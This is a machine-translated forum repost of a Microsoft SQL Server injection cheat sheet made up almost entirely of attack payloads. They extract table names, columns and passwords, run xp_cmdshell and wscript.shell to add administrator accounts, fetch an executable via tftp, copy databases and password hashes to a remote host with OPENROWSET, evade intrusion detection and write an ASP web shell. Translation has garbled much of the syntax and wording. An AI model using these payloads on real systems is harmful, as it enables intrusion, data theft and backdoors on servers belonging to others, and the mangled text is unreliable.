SQL injection summary

xiaoxiao2021-03-06 16

SQL injection summary (native to 'or'1' = '1)

The most important of the table name: select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses

The most important user name (the default SQL database exists) PUBLICDBOGUEST (general prohibition, or no permissions) DB_SercurityAdminab_dlladmin

Some default extensions

xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwritexp_availablemedia drive related xp_dirtree directory xp_enumdsn ODBC connection xp_loginconfig server security mode information xp_makecab create compressed volume xp_ntsec_enumdomains domain information xp_terminate_process terminal process, given a PID

For example: sp_addextendedproc 'xp_webserver', 'c: /temp/xp_foo.dll'exec xp_webserversp_dropextendedproc' xp_webserver'bcp "select * FROM test..foo" queryout c: /inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa - Pfoobar 'group by users.id Having 1 = 1-' Group by users.id, users.username, users.password, users.privs haVing 1 = 1- '; Insert Into Users Values (666,' Attacker ',' FOOBAR ', 0xffff) -

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable'-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME =' logintable 'where COLUMN_NAME NOT IN (' login_id ') - union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = 'logintable' where COLUMN_NAME NOT IN ( 'login_id', 'login_name') - union select TOP 1 login_name FROM logintable-union select TOP 1 password FROM logintable where login_name = 'Rahul' - construction statement: query whether there xp_cmdshell 'union select @@ version, 1, 1, 1 - and 1 = (select @@ version) and' sa '= (select system_user)' Union Select RET, 1, 1, 1 from foo - 'union Select Min (Username), 1, 1 from users where username> 'a'-' union select min (username), 1, 1, 1 from users where username> 'admin'-' union Select Password, 1, 1, 1 from users where username = 'admin' - and user_name () = 'dbo'and 0 <> (select user_name () -; DECLARE @shell INT EXEC sP_OAcreate' wscript.shell ', @ shell OUTPUT EXEC sP_OAMETHOD @shell,' Run ', NULL,' C: / WINNT / SYSTEM 32 / cmd.exe / c net user swap 5245886 / add'and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell'); exec master.dbo.sp_addextendedProc ' XP_cmdshell ',' XPLog70.dll '

1 = (% 20Select% 20count (*)% 20FROM% 20master.dbo.sysObjects% 20where% 20 type = 'x'% 20And% 20name = 'xp_cmdshell') and 1 = (select is_srvrolemember ('sysadmin')) Judging SA Permissions Whether And 0 <> (Select Top 1 Paths from NewTable) - Branches Dafa and 1 = (Select Name from Master.dbo.sysDatabases Where DBID = 7) Get the library name (from 1 to 5 are the iD, 6 The above can be judged) Create a virtual directory E disk: declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: / inetpub / wwwroot / mkwebdir .vbs -w "default Web Site" -V "e", "e: /" 'access attribute: (with write a webhell) Declare @o int exec sp_oacreate' wscript.shell ', @o out exec sp_oamethod @o , 'Run', NULL, 'CScript.exe C: /inetpub/wwwroot/chaccess.vbs -a W3SVC / 1 / Root / E Browse'and 0 <> (Select Count (*) from master.dbo.sdatabases where Name> 1 and dbid = 6) Submit DBID = 7, 8, 9 .... Get more database name and 0 <> (select top 1 name from bbs.dbo.sysobjects where xtype = 'u') To a table assume as admin

AND 0 <> (Select Top 1 Name from bbs.dbo.sysObjects where xtype = 'u' and name not in ('admin')) is available. And 0 <> (Select Count (*) from bbs.dbo.sysobjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Value Value Value assumes 18779569 UID = IDAND 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of Admin, assume User_idand 0 <> (SELECT TOP 1 Name from bbs.dbo.syscolumns where id = 18779569 and name not in ('id', ...)) to fade other fields and 0 <(Select user_id from bbs bbs.dbo.admin where username> 1) You can get a password in order. . . . . Assume that the presence of user_id username, password and other fields

SHOW.ASP? ID = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from adminshow.asp? Id = -1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union statement is popular, Access is also special skills ::% 5c = '/' Or put / and / modify% 5 Submit an AND 0 <> (Select Count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where Xtype = 'u') Get a table name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = 'u' and name not in ('address')) and 0 <> (Select Count (*) From bbs.dbo.sysObjects where xtype = 'u' and name = 'admin' and uid> (ID))) Judgment ID value and 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 773577794 ) All fields

http: //xx.xx.xx.xx/111.asp? id = 3400; Create Table [DBO]. [swap] ([swappass] [char] (255));

http://xx.xx.xx.xx/111.asp? id = 3400 and (select top 1 swappass from swap) = 1; Create Table newTable (ID Int Id IDENTITY (1, 1), Paths Varchar (500)) Declare @test varchar (20) exec master..xp_regread @ rootkey = 'HKEY_LOCAL_MACHINE', @ key = 'SYSTEM / CurrentControlSet / Services / W3SVC / Parameters / Virtual Roots /', @value_name = '/', values = @ test OUTPUT INSERT INTO PATHS (PATH) VALUES (@test)

http://61.131.96.39/pageshow.asp?tianname= Policy Regulations & Infoid = {57C4165A-4206-4C0D-A8D2-E70666EE4E08}; USE% 20Master; Declare% 20 @ s% 20% 20INT; EXEC% 20sp_oacreate% 20 " Wscript.shell, @ s% 20OUT; EXEC% 20sp_oamethod% 20 @ s, "run", null, "cmd.exe% 20 / c% 20PING% 201.1.1.1";

Get the web path D: / xxxx, next: http://xx.xx.xx.xx/111.asp? Id = 3400; use ku1; - http: //xx.xx.xx.xx/111 .asp? id = 3400; CREATE TABLE CMD (STR Image);

Traditional XP_cmdshell test procedure:; exec master "; exec master.dbo.sp_addlogin Hax; -; exec master.dbo.sp_password null, Hax, Hax; -; exec master.dbo.sp_addsrvroleMember Hax sysadmin; -; exec master.dbo.xp_cmdshell 'net user Hax 5258 / workStations: * / time: all / passwordchg: Yes / PasswordReq: Yes / Active: Yes / add'; -; exec master.dbo.xp_cmdshell 'net localgroup administrators hax / add'; - EXEC MASTER.. pP_SERVICECONTROL 'Start', 'Schedule' Exec Master ", 'Server'Http://www.xxx.com/list.asp? classid = 1; declare @Shell int exec sp_oacreate 'wscript.shell', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: /winnt/system32/cmd.exe / c Net user swap 5258 / add'; DECLARE @shell INT EXEC sP_OAcreate 'wscript.shell', @ shell OUTPUT EXEC sP_OAMETHOD @ shell, 'run', null, 'C: /WINNT/system32/cmd.exe / c net localgroup administrators swap / add'http: // Localhost / show.asp? id = 1 '; exec master..xp_cmdshell' tftp -i youip get file.exe'-

Declare @a sysname set @ a = 'xp _' 'cmdshell' exec @A 'DIR C: /' DECLARE @A sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: / '; declare @a; set @ a = db_name (); backup database @a to disk =' Your IP Your shared directory Bak.dat 'If the limit can be. Select * from OpenRowSet ('SQLOLEDB', 'Server'; 'Sa'; '', 'SELECT' '' '' EXEC MASTER.DBO.SP_ADDLOGIN HAX ') Traditional Query Construction: SELECT * from news where id = .. And Topic = ... and ..... Admin 'And (*) from [user] where username =' Victim 'And Right (Left (UserPass, 01), 1) =' 1 ' ) and userpass <> 'SELECT 123; -; use master; -: a' or name like 'fff%'; - Show with a user named FFFF. 'and 1 <> (user]); -; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and status> 0) Where name =' FFFF '; - Description: The above statement is to get the first user table in the database and put the table name in the mailbox field of the FFFF user. By viewing the user information of FFFF, you can get the first table called AD and get the idffff 'of this table according to the table name Ad, Update [users] set email = (Select Top 1 id from sysobjects where xtype =' u 'and name = 'ad') Where name = 'fff'; - I can get the name of the second table in the next table, fff '; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and) ID> 581577110) WHERE Name = 'fff'; - fff '; Update [users] set email = (select top 1 count (id) from password) where name =' fff '; - fff'; Update [Users] Set email = (select top 1 pwd from password where id = 2) where name = 'fff';

ffff '; update [users] set email = (select top 1 name from password where id = 2) where name =' ffff '; - exec master..xp_servicecontrol' start ',' schedule 'exec master..xp_servicecontrol' start ',' Server 'XP_ADDEXTENDPROC' XP_WEBSERVER ',' C: /TEMP/XP_FOO.DLL 'Extended Storage You can call through the general method: Exec XP_Webserver Once this extension store is executed, you can delete it: sp_dropextendedProc' xp_webserver '

INSERT INTO Users Values (666, Char (0x63) Char (0x68) Char (0x72) CHAR (0x69) CHAR (0x73), Char (0x63) CHAR (0x68) CHAR (0x72) char (0x69 CHAR (0x73), 0xfff) -

INSERT INTO USERS VALUES (667, 123, 123, 0xFFF) -

INSERT INTO USERS VALUES (123, 'Admin' '-', 'Password', 0xfff) -

And user> 0 ;; and (select count (*) from sysobjects> 0 ;; and (select count (*) from mysysObjects> 0 // for Access database

-------------------------------------------------- ------- Some of usually injected: a) ID = 49 These injected parameters are digital type, and the SQL statement is roughly as follows: SELECT * FROM table name where field = 49 Injection parameters Id = 49 and [Query Condition], that is, generating statement: SELECT * FROM table name Where field = 49 and [query condition]

(B) Class = Continuous argument This type of injection is a character type, and the SQL statement is generally approrated: SELECT * FROM table name where FROM table name WHERE field = 'consecutive' injection parameter is class = series' and [query criteria] and '' = ', That is, generating statement: SELECT * FROM table name Where field =' Serpest 'and' '=' '(c) No filtering parameters, such as keyword = keyword, SQL statement is roughly as follows : SELECT * FROM Table Name Where Field Like '% Keyword%' Injection Parameters is Keyword = 'AND [Query Condition] and'% 25 '=' 'and' = '%' ;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0SysObjects is the system table of SQL Server, stores all the table names, View, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement takes the first table name, smaller than 0, so that the error information exposes the table name. ; And (select top 1 col_name (Object_ID ('Name')> 0 After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name ("COL_NAME) Table name ID, 1) Represents the first field name of the table, replace it with 2, 3, 4 ... You can get the field name inside the specified sheet one by one.

POST.HTM content: It is mainly convenient to enter. </ iframe> <br> <form action = http: //test.com/count.asp target = p> <input name = "ID "value =" 1552; Update aaa set aaa = (select top 1 name from sysobjects where xtype = 'u' and status> 0); - "Style =" Width: 750> <input type = submit value = ">>> >>> <input type = hidden name = fno value = "2, 3"> </ form> enumerating his data table name: ID = 1552; Update AAA SET AAA = (Select Top 1 Name from sysobjects where Xtype = 'u' and status> 0); - This is to update the first table name to the field of AAA. Read the first table, the second table can be read out (adding the table name "just obtained after the condition). ID = 1552; Update aaa set aaa = (Select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name <> 'vote'); - then id = 1552 and exists (SELECT * AAA WHERE AAA > 5) Read the second table, ^^^^^^^^^^^^^^^</p> <p>Reading field is this: ID = 1552; Update aaa set aaa = (select top 1 col_name (Object_ID ('Name'), 1)); - then id = 1552 and exists (SELECT * from Aaa Where AAA> 5) Error, get the field name id = 1552; Update aaa set aaa = (object_id ('table name), 2)); - then id = 1552 and exists (SELECT * from AAA WHERE AAA> 5) Error, get the name of the field ------------------------------ Advanced Tips: [Get Data Name] [Segment Value Update to the table name, then you can get the table name] Update table name SESOBJECTS WHERE Xtype = u and status> 0 [and name <> "you get Name 'Identified One Add]) [WHER Condition] SELECT TOP 1 Name from sysobjects where xtype = u and status> 0 and name not in (' table1 ',' Table2 ', ...) Involved Database Administrator Account and system administrator account [Current account must be sysadmin group] [Get Data Table Field Name] [Update the field value as a field name, then you can get the value of this field "Update table name SET field = (SELECT TOP 1 COL_NAME (Object_ID ('To query the data table name), field list, such as: 1) [Where condition]</p> <p>Repeat IDS detection [Use variable] Declare @a sysname set @ a = 'xp _' 'cmdshell' exec @a 'Dir C: /' declare @a sysname set @ a = 'xp' '_ cm' ' DShell 'Exec @a' DIR C: / '</p> <p>1. Open the remote database Basic syntax Select * from openrowset ('SQLOLEDB', 'Server = ServerName; UID = SA; PWD = APACHY_123', 'SELECT * from Table1') Parameters: (1) OLEDB Provider Name2, where connected strings The parameters can be any and ports to connect, such as select * from OpenrowSet ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbms SoCn; address = 202.100.100.1, 1433;', 'SELECT * from Table'</p> <p>To copy the entire database of the target host, you must first establish a connection on the target host and the database on your machine (how to establish a remote connection on the target host, just have already talked), and then all remote tables of INSERT to the local table.</p> <p>Basic syntax: INSERT INTO OPENROWSET ('sqloledb', 'server = servername; uid = sa; pwd = apachy_123', 'select * from table1') Select * from table2 This row statement copy all data in Table2 table on Table2 table on the target host Go to the Table1 table in the remote database. The actual use of the IP address and port of the connection string are appropriately modified, pointing to where you need, such as Insert Into OpenRowSet ('sqloledb', 'UID = SA; PWD = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' select * from table1 ') select * from table2insert into OPENROWSET (' SQLOLEDB ',' uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433; ',' select * from _sysdatabases') Select * from master.dbo.sysdatabases</p> <p>insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = hack3r; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects</p> <p>insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns</p> <p>After that, you can see the library structure of the target host from the local database, which is easy, not much, copy database: INSERT INTO OPENROWSET ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433; ',' Select * from table1 ') SELECT * from Database..table1</p> <p>INSERT INTO OpenRowSet ('sqloledb', 'uid = sa; pwd = apachy_123; network = dbmssocn; address = 202.100.100.1, 1433;', 'select * from table2') Select * from database..table2</p> <p>......</p> <p>3, complex 4, Haxi table (HASH)</p> <p>This is actually the above complex 5, an extension application of the database. The login password is stored in sysxlogins. As follows: insert into OPENROWSET ( 'SQLOLEDB', 'uid = sa; pwd = apachy_123; Network = DBMSSOCN; Address = 202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins give After Hash, 6 can make violent cracks. This requires a little luck and a lot of time. Ways to traverse catalog: Create a temporary table: Temp'5; Create Table Temp (ID NVARCHAR (255), Num2 NVARCHAR (255), Num3 NVARCHAR (255)); - 5 '; Insert Temp Exec Master.dbo.xp_availablemedia; - Get all current drive 5 '; Insert Into Temp (ID) exec master.dbo.xp_subdirs' c: / '; - Loose subdirectories list 5'; Insert INTO TEMP (ID, NUM1) EXEC MASTER.DBO.XP_DIRTREE 'C: /'; - Get the directory tree structure of all subdireuses, inch into the TEMP table</p> <p>5 '; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHEC' TYPE C: /WEB/index.asp '; - View content of a file 5'; Insert Into Temp (ID) Exec master.dbo.xp_cmdshell 'DIR C: /'; - 5 '; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_CMDSHELL' DIR C: / * .ASP / S / A '; - 5'; Insert Into Temp (ID) EXEC Master.dbo.xp_cmdshell 'cscript c: /inetpub/adminscripts/adsutil.vbs Enum W3SVC'</p> <p>5 '; INSERT INTO TEMP (ID, NUM1) EXEC MASTER.DBO.XP_DIRTREE' C: / '; - (XP_Dirtree Application Public) Write Table: Statement 1: http://www.xxxxx.com/down/ List.asp? id = 1 and 1 = (select is_srvrolemember ('sysadmin')); - Statement 2: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember ('ServerAdmin'); - Statement 3: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember ('setupadmin')); - Statement 4: HTTP : //www.xxxxx.com/down/list.asp? id = 1 and 1 = (SELECT IS_SRVROLEMEMBER ('securityadmin')); - Statement 5: http://www.xxxxx.com/down/list. ASP? ID = 1 and 1 = (select is_srvrolemember ('securityadmin')); - statement 6: http://www.xxxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember) Diskadmin ')); - Statement 7: http://www.xxxx.com/down/list.asp? id = 1 and 1 = (select is_srvrolemember (' bulkadmin ')); - Statement 8: http: / /www.xxxxx.com/down/list.asp?id=1 and 1 = (select is_srvrolemember ('bulkadmin')); - Statement 9: http://www.xxxxx.com/down/list.asp? ID = 1 and 1 = (select is_member ('db_owner')); - Write the path to the table: http://www.xxxxx.com/down/list.asp? id = 1; Create Table DIRS Paths varcha R (100), ID int) - http: // http://www.xxxxx.com/down/list.asp? id = 1; INSERT DIRS EXEC MASTER.DBO.XP_DIRTREE 'C: /' - http: / /Http://www.xxxxx.com/down/list.asp?id=1 and 0 <> (Select Top 1 Paths from DIRS) - http: // http://www.xxxxx.com/down/list .asp? id = 1 and 0 <> (Select Top 1 Paths from DIRS WHERE PATHS NOT IN ('@ inetpub')) - Statement: http:// http://www.xxxxx.com/down/list.asp ? id = 1; CREATE TABLE DIRS1 (Paths VARCHAR (100), ID INT) - statement:</p> <p>http:// http://www.xxxx.com/down/list.asp? id = 1; INSERT DIRTRTR MASTER.DBO.XP_DIRTREE 'E: / Web' - statement: http:// http: // Www.xxxxx.com/down/list.asp?id=1 and 0 <> (SELECT TOP 1 PATHS from DIRS1) - Back up the database to web directory: Download http:// http://www.xxxxx.com/ DOWN / LIST.ASP? ID = 1; declare @a sysname; set @ a = db_name (); backup database @a to disk = 'e: /web/down.bak'; - and% 201 = (SELECT% 20top% 201% 20Name% 20FROM (select% 20top% 2012% 20ID, Name% 20FROM% 20SysObjects% 20where% 20XTYPE = char (85))% 20T% 20Desc) and% 201 = (select% 20top) % 201% 20COL_NAME (Object_ID ('user_login'), 1)% 20FROM% 20SysObjects) See related tables. AND 1 = (select% 20User_id% 20FROM% 20User_login) and% 200 = (select% 20User% 20FROM% 20User_login% 20where% 20User> 1)</p> <p>.......................................................... - wscript.shell example declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' It could be run in our sample scenario by specifying the following username (all on one line): username: '; declare @o int exec sp_oacreate' wscript.shell ', @o out exec sp_oamethod @o , 'run', NULL, 'notepad.exe' - 2) This example uses the 'scripting.filesystemobject' object to read a known text file: - scripting.filesystemobject example - read a known file declare @o int, @ F int, @T, @ret int declare @line varchar (8000) Exec sp_oacreate 'scripting.filesystemObject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c: /boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @Line out while (@ret = 0) begin print @line exec @Ret = sp_oamethod @f, 'readline', @line out end end * This Example Creates an ASP Script That Will Run Any Command Passed To It in QueryString: - Scripting.FileSystemObject Example - Create a 'Run this' .asp file Declare @o int, @RET INT EXEC SP_OACREATE 'Scripting.FilesystemObject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c: / inetpub / wwwroot / foo. ASP ', 1 exec @ret = sp_oamethod @f,' writeline ', null,' <% set o = server.createObject ("wscript.shell": o.run (Request.QueryString ("cmd"))%> '</p> <p>It is important to note that when running on a Windows NT4, IIS4 platform, commands issued by this ASP script will run as the 'system' account. In IIS5, however, they will run as the low-privileged IWAM_xxx account. 4) This (somewhat spurious) example illustrates the flexibility of the technique; it uses the 'speech.voicetext' object, causing the SQL Server to speak: Page 16declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec SP_OAMETHOD @o, 'register', null, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', null, 'all your sequel servers are Belong to, US', 528 waitfor delay '00: 00: 05 'This could of course be run in our example scenario, by specifying the following' username '(note that the example is not only injecting a script, but simultaneously logging in to the application as' admin '): Username: admin'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', null, 'foo', 'Bar' Exec S P_oasetproperty @o, 'speed', 150 Exec sp_oamethod @o, 'speak', null, 'all Your Sequel Servers Are Belong To US, 528 Waitfor DELAY '00: 00: 05' -</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-49937.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="49937" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.185</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'fI_2FttBALQlyMJKVX4d2Iv6pYOL2FeD9wSqNZhySB2ghtzsgAidccqJA5ZX8bTeNKRMJ8m5FGsxVlUaKu1xdpcg_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>